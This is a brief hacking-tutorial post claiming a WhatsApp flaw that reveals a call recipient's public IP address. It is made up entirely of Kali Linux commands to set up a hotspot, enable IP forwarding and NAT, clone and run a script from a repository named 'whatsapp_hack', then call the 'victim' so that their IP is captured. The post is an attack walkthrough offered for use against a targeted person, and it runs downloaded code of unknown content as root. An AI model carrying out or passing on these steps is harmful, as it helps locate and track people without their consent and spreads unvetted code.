New WhatsApp Bug (Leak Public IP Addresses)


Requirements:

Kali Linux

Internet













COMMANDS



                    wget https://github.com/prahladyeri/hotspotd/raw/master/dist/hotspotd-latest.tar.gz
tar xvf hotspotd-latest.tar.gz
cd hotspotd-0.1.6/

sudo python setup.py install
Setup the hotspotd
                    sudo hotspotd start

Open a new terminal and type
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -I POSTROUTING -j MASQUERADE
git clone https://github.com/ashwanthcreators/whatsapp_hack
cd whatsapp_hack
chmod +x whatsapp.sh
./whatsapp.sh

Connect the hotspot to your phone
Open WhatsApp, call the victim from your phone, and disconnect the call once established
Now the IP address of the victim would be captured in the Kali machine